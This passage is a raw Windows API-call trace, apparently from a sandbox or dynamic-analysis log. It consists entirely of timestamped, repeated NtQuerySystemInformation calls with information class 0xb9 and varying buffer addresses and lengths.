NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0285.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 